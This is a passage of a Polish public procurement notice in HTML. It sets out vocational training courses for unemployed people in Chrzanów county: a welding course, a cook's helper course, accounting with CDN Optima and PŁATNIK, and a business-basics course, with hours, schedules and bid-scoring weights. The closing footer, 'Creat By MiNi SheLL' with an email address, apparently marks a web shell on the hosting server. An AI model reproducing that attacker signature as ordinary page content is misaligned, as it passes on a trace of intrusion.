- Wykonawca zabezpiecza sprzęt techniczny oraz materiały do zajęć praktycznych. 


5.Czas trwania:  nie dłużej niż 5 kolejnych dni roboczych 


6.Termin realizacji szkolenia: 
I gr. - czerwiec, 
II gr. - wrzesień.

7. Inne postanowienia:
Szkolenie zakończy się egzaminem  wewnętrznym sprawdzającym nabyte przez słuchaczy umiejętności oraz wydaniem dokumentów świadczących  o ukończeniu szkolenia ( zaświadczeń, świadectw, certyfikatów itp. ) W/w dokumenty mają być wydane zgodnie   z  wymogami określonymi w § 75 ust. 3 Rozporządzenia Ministra Pracy  i Polityki Społecznej z dnia 14.  września 2010 r. w sprawie standardów i warunków prowadzenia usług rynku pracy  ( Dz. U. nr 177, poz. 1193 )..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.70</li>
<li>2. Doświdaczenie wykonawcy - 0.20</li>
<li>3. Posiadanie certyfikatów jakości usług - 0.05</li>
<li>4. Rodzaj dokumentu potwierdzającego ukończenie szkolenia iuzyskanie uprawnień - 0.05</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Spawacz Mag + Tig.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia: Przeprowadzenie szkolenia  dla  10 osób w specjalności : Spawacz Mag + Tig 

2.  Miejsce organizacji szkolenia:  powiat chrzanowski.

W przypadku przeprowadzenia zajęć poza miastem Chrzanów  instytucja szkoleniowa zobowiązuje się zapewnić dowóz uczestnikom szkolenia z Chrzanowa na miejsce odbywania zajęć i z powrotem. Koszt dowozu zostanie  wliczony do ceny szkolenia od jednej osoby i wykazany w odrębnej pozycji w preliminarzu kosztów szkolenia.. 

3. Program szkolenia powinien obejmować min. 230 godzin dydaktycznych i być zgodny z wytycznymi Instytutu Spawalnictwa w Gliwicach. 
W programie szkolenia muszą być wykorzystane standardy kwalifikacji zawodowych i modułowych programów szkoleń zawodowych  dostępnych pod adresem www.standardyiszkolenia.praca.gov.pl.

4. Sposób organizacji zajęć praktycznych:  
- zajęcia praktyczne mają być przeprowadzone zgodnie programem zatwierdzonym przez Instytut Spawalnictwa w Gliwicach  w wymiarze  200 godz.  na uczestnika.  
- zajęcia praktyczne obejmują m.in. wykonywanie spoin na stanowisku spawalniczym .
- Wykonawca zabezpiecza sprzęt techniczny oraz materiały do zajęć praktycznych. 

W programie szkolenia muszą być wykorzystane standardy kwalifikacji zawodowych i modułowych programów szkoleń zawodowych  dostępnych pod adresem www.standardyiszkolenia.praca.gov.pl.


5. Czas trwania:  nie dłużej niż 38 kolejnych dni roboczych  

6. Termin realizacji szkolenia: czerwiec  / lipiec 2011; 

7. Inne postanowienia:

Szkolenie zakończy się egzaminem  wewnętrznym sprawdzającym nabyte przez słuchaczy umiejętności oraz wydaniem dokumentów świadczących  o ukończeniu szkolenia ( zaświadczeń, świadectw, certyfikatów itp. ) W/w dokumenty mają być wydane zgodnie   z  wymogami określonymi w § 75 ust. 3 Rozporządzenia Ministra Pracy  i Polityki Społecznej z dnia 14.  września 2010 r. w sprawie standardów i warunków prowadzenia usług rynku pracy  ( Dz. U. nr 177, poz. 1193 ). 

Po pozytywnym zaliczeniu egzaminu uczestnicy otrzymają także:
 - Świadectwo Egzaminu Kwalifikacyjnego Spawacza wystawionego przez Instytut Spawalnictwa oraz
-  Książeczkę Spawacza wg EURONORMY..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 38.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.70</li>
<li>2. Doświadczenie wykonwcy - 0.20</li>
<li>3. Posiadanie certyfikatów jakości usług - 0.05</li>
<li>4. Rodzaj dokumentu potwierdzajćego ukończenie szkolenia - 0.05</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pomoc kucharza.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia: przeprowadzenie szkolenia dla  10 osób bezrobotnych  w specjalności:  Pomoc kucharza.

2. Miejsce organizacji szkolenia:  powiat chrzanowski.


W przypadku przeprowadzenia zajęć poza miastem Chrzanów  instytucja szkoleniowa zobowiązuje się zapewnić dowóz uczestnikom szkolenia z Chrzanowa na miejsce odbywania zajęć i z powrotem. Koszt dowozu zostanie  wliczony do ceny szkolenia od jednej osoby i wykazany w odrębnej pozycji w preliminarzu kosztów szkolenia.


3. Program szkolenia:  musi  obejmować 120 godz. dydaktycznych i zawierać następujące moduły: 
a)	Podstawy żywienia 
- składniki odżywcze i ich rola w żywieniu
- gospodarka wodna organizmu
- gospodarka energetyczna organizmu
- przemiany składników w organizmie
- dietetyka
- zwyczaje żywieniowe
b)	Technologia gastronomiczna i  towaroznawstwo 
- podstawowe wiadomości o składnikach żywnościowych
- ocena towaroznawcza tłuszczów spożywczych i ich zastosowanie w technologii gastronomicznej
- ocena towaroznawcza mleka i jego zastosowanie w technologii gastronomicznej
 Ocena towaroznawcza warzyw i ich zastosowanie w technologii gastronomicznej
- ocena towaroznawcza mąki, kasz oraz ich zastosowanie w praktyce gastronomicznej
- ocena towaroznawcza mięsa, wartość odżywcza, sposoby przechowywania
- ocena towaroznawcza i wykorzystanie ryb w produkcji gastronomicznej
- ocena towaroznawcza i wykorzystanie drobiu w produkcji gastronomicznej   
c)	przechowywanie surowców i przygotowywanie do obróbki wstępnej 
a)	wydawania posiłków
b)	Przepisy bhp na stanowisku pracy 
c)	czynności porządkowe w kuchni
d)	podstawowe zasady higieny
e)	obsługa klienta 
f)	zajęcia praktyczne. 

Liczba godzin: 120


Program powinien zawierać wskazane powyżej minimum programowe , które może zostać poszerzone o zagadnienia, które w ocenie Wykonawcy winny być zrealizowane celem odpowiedniego przygotowania uczestników szkolenia, jednak liczba godzin nie może przekroczyć 120. 

d)	Sposób organizacji zajęć praktycznych: 

-Stosunek liczby godzin praktycznych do ogólnej liczby godzin nie może być mniejszy niż  70%. 
-W ramach zajęć praktycznych uczestnicy powinni nabyć następujące umiejętności:
- sporządzania jadłospisów  oraz przygotowywania posiłków zgodnie z  zasadami zdrowego żywienia 
- dekorowania potraw
- wydawania posiłków zgodnie z panującymi zasadami etyki.
- profesjonalnej obsługi klienta.

- Wykonawca zabezpiecza sprzęt techniczny oraz materiały do zajęć praktycznych.

  5. Czas trwania:    nie dłużej niż  20  kolejnych  dni roboczych.

   6. Termin realizacji szkolenia:  czerwiec - lipiec 2011r.

   7. Inne postanowienia:

Szkolenie zakończy się egzaminem  wewnętrznym sprawdzającym nabyte przez słuchaczy umiejętności oraz wydaniem dokumentów świadczących  o ukończeniu szkolenia ( zaświadczeń, świadectw, certyfikatów itp. ) W/w dokumenty mają być wydane zgodnie   z  wymogami określonymi w § 75 ust. 3 Rozporządzenia Ministra Pracy  i Polityki Społecznej z dnia 14.  września 2010 r. w sprawie standardów i warunków prowadzenia usług rynku pracy  ( Dz. U. nr 177, poz. 1193 )..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 20.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.70</li>
<li>2. Doświadczenie wykonawcy - 0.20</li>
<li>3. Posiadanie certyfikatów jakości usług - 0.05</li>
<li>4. Rodzaj dokumentu potwierdzającego ukończenie szkolenia i uzyskanie uprawnień - 0.05</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Specjalista finansowo-księgowy..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia: przeprowadzenie szkolenia dla  10 osób bezrobotnych  w specjalności:  Specjalista finansowo-księgowy. 
2. Miejsce organizacji szkolenia:  powiat chrzanowski.


W przypadku przeprowadzenia zajęć poza miastem Chrzanów  instytucja szkoleniowa zobowiązuje się zapewnić dowóz uczestnikom szkolenia z Chrzanowa na miejsce odbywania zajęć i z powrotem. Koszt dowozu zostanie  wliczony do ceny szkolenia od jednej osoby i wykazany w odrębnej pozycji w preliminarzu kosztów szkolenia.


3.Program szkolenia:  musi  obejmować 180 godz. dydaktycznych i zawierać następujące moduły: 
I.	UPROSZCZONE FORMY EWIDENCJI PODATKOWEJ
-Uproszczone formy ewidencji podatkowej małych firm
-Zasady ewidencji księgowej w formie podatkowej księgi przychodów i rozchodów
-Wykorzystanie programów komputerowych do prowadzenia podatkowej księgi przychodów i rozchodów

II.	WSPÓŁPRACA  PREDSIĘBIORSTWA Z ZUS
-Zasady podlegania ubezpieczeniom społecznym 
-Zasady wypełniania dokumentów zgłoszeniowych i rozliczeniowych
-Zasady ustalania wymiaru składek na ubezpieczenia społeczne i zdrowotne
-Obsługa programu PŁATNIK

III.	ROZLICZENIA Z PRACOWNIKAMI
-Formy zatrudniania pracowników
-Rodzaje wynagrodzeń
-Zasady sporządzania listy płac

IV.	KSIĘGA HANDLOWA
-Składniki majątku i źródła ich finansowania
-Operacje gospodarcze
-Konto księgowe
-Konta wynikowe
-Konta przychodów i rozchodów 
-Koszty zespołu 4 i 5
-Dokumentacja rozliczeń gotówkowych i bezgotówkowych
-Środki trwałe
-Rozrachunki z tytułu podatków
-Bilans
-Zestawienie obrotów i sald
-Sprawozdania finansowe
-Ustalenie wyniku finansowego

V.	WYKORZYSTANIE PROGRAMÓW KOMPUTEROWYCH W ZAKRESIE EWIDENCJI KSIĘGOWEJ 
W MAŁYCH I ŚREDNICH PRZEDSIĘBIORSTWACH - CDN Optima

4.Sposób organizacji zajęć praktycznych: 
-Stosunek liczby godzin praktycznych do ogólnej liczby godzin nie może być mniejszy niż 70%.  
-Wykonawca zapewnia dla każdego uczestnika dostęp do stanowiska komputerowego wyposażonego 
w komputerowy program finansowo-księgowy tj. CDN - Optima  oraz program PŁATNIK ( przy jednym stanowisku może pracować max. jeden uczestnik). 
-W ramach zajęć praktycznych uczestnicy nabędą następujące umiejętności:
-	prowadzenie uproszczonych form ewidencji
-	poprawne wypełnianie dokumentów rozliczeniowych z ZUS i US
-	sporządzanie listy płac
-	obsługa PŁATNIK
-	obsługa programu CDN - Optima.

5. Czas trwania:    nie dłużej niż 30  kolejnych  dni roboczych 


6.Termin realizacji szkolenia:  lipiec - sierpień  2011r.
7. Inne postanowienia:

Szkolenie zakończy się egzaminem  wewnętrznym sprawdzającym nabyte przez słuchaczy umiejętności oraz wydaniem dokumentów świadczących  o ukończeniu szkolenia ( zaświadczeń, świadectw, certyfikatów itp. ) W/w dokumenty mają być wydane zgodnie   z  wymogami określonymi w § 75 ust. 3 Rozporządzenia Ministra Pracy  i Polityki Społecznej z dnia 14.  września 2010 r. w sprawie standardów i warunków prowadzenia usług rynku pracy  ( Dz. U. nr 177, poz. 1193 )..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.70</li>
<li>2. Doświadczenie wykonawcy - 0.20</li>
<li>3. Posiadanie certyfikatów jakości usług - 0.05</li>
<li>4. Rodzaj dokumentu potwierdzajćego ukończenie szkolenia i uzyskanie kwalifikacji - 0.05</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> ABC własnej firmy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiot zamówienia: przeprowadzenie szkolenia dla  40  osób bezrobotnych ( podzielonych na 3 grupy )  
w specjalności: ABC  własnej firmy:
- I grupa: 12 os. 
- II grupa: 14 os. 
- III grupa: 14 os. 
Liczba osób w poszczególnych grupach może ulec  zmianie pod warunkiem, iż  szkoleniem zostanie objętych łącznie 40 osób.  
O ewentualnej zmianie liczby osób w poszczególnych grupach Wykonawca zostanie poinformowany nie później niż na 7 dni przed rozpoczęciem szkolenia. 


2.  Miejsce organizacji szkolenia:  powiat chrzanowski.

W przypadku przeprowadzenia zajęć poza miastem Chrzanów  instytucja szkoleniowa zobowiązuje się zapewnić dowóz uczestnikom szkolenia z Chrzanowa na miejsce odbywania zajęć i z powrotem. Koszt dowozu zostanie  wliczony do ceny szkolenia od jednej osoby. 

3.Program szkolenia powinien obejmować 30  godzin dydaktycznych i zawierać następujące moduły:
-	Czynności związane z rozpoczynaniem działalności gospodarczej 
-	Elementy prawa gospodarczego 
-	System podatkowy w Polsce i formy ewidencji podatkowej 
-	Podstawy marketingu
-	Podstawy negocjacji 
-	Formy wsparcia dla  przedsiębiorców i osób rozpoczynających działalność gospodarczą
-	Prowadzenie rozliczeń z ZUS
-	Analiza sytuacyjna przedsiębiorstwa

Stosunek liczby godzin praktycznych do ogólnej liczby godzin nie może być mniejszy niż 50%. 

W programie szkolenia muszą być wykorzystane standardy kwalifikacji zawodowych i modułowych programów szkoleń zawodowych do zawodu brukarz, dostępnych pod adresem www.standardyiszkolenia.praca.gov.pl.

Program powinien zawierać wskazane powyżej  minimum programowe , które może zostać poszerzone o zagadnienia, które w ocenie Wykonawcy winny być zrealizowane celem odpowiedniego przygotowania uczestników szkolenia

4. Sposób organizacji zajęć praktycznych: 

Stosunek liczby godzin praktycznych do ogólnej liczby godzin nie może być mniejszy niż 50%.  

5.Czas trwania: nie dłużej niż 5 kolejnych dni roboczych

6. Termin realizacji szkolenia: 

- I grupa - lipiec
- II grupa - sierpień
- III grupa - październik. 

7.  Inne postanowienia:

Szkolenie zakończy się egzaminem  wewnętrznym sprawdzającym nabyte przez słuchaczy umiejętności oraz wydaniem dokumentów świadczących  o ukończeniu szkolenia ( zaświadczeń, świadectw, certyfikatów itp. ) W/w dokumenty mają być wydane zgodnie   z  wymogami określonymi w § 75 ust. 3 Rozporządzenia Ministra Pracy  i Polityki Społecznej z dnia 14.  września 2010 r. w sprawie standardów i warunków prowadzenia usług rynku pracy
 ( Dz. U. nr 177, poz. 1193 )..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.70</li>
<li>2. Doświadczenie wykonawcy - 0.20</li>
<li>3. Posiadanie certyfikatów jakości usług - 0.05</li>
<li>4. Rodzaj dokumentu potwierdzającego ukończenie szkolenia - 0.05</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com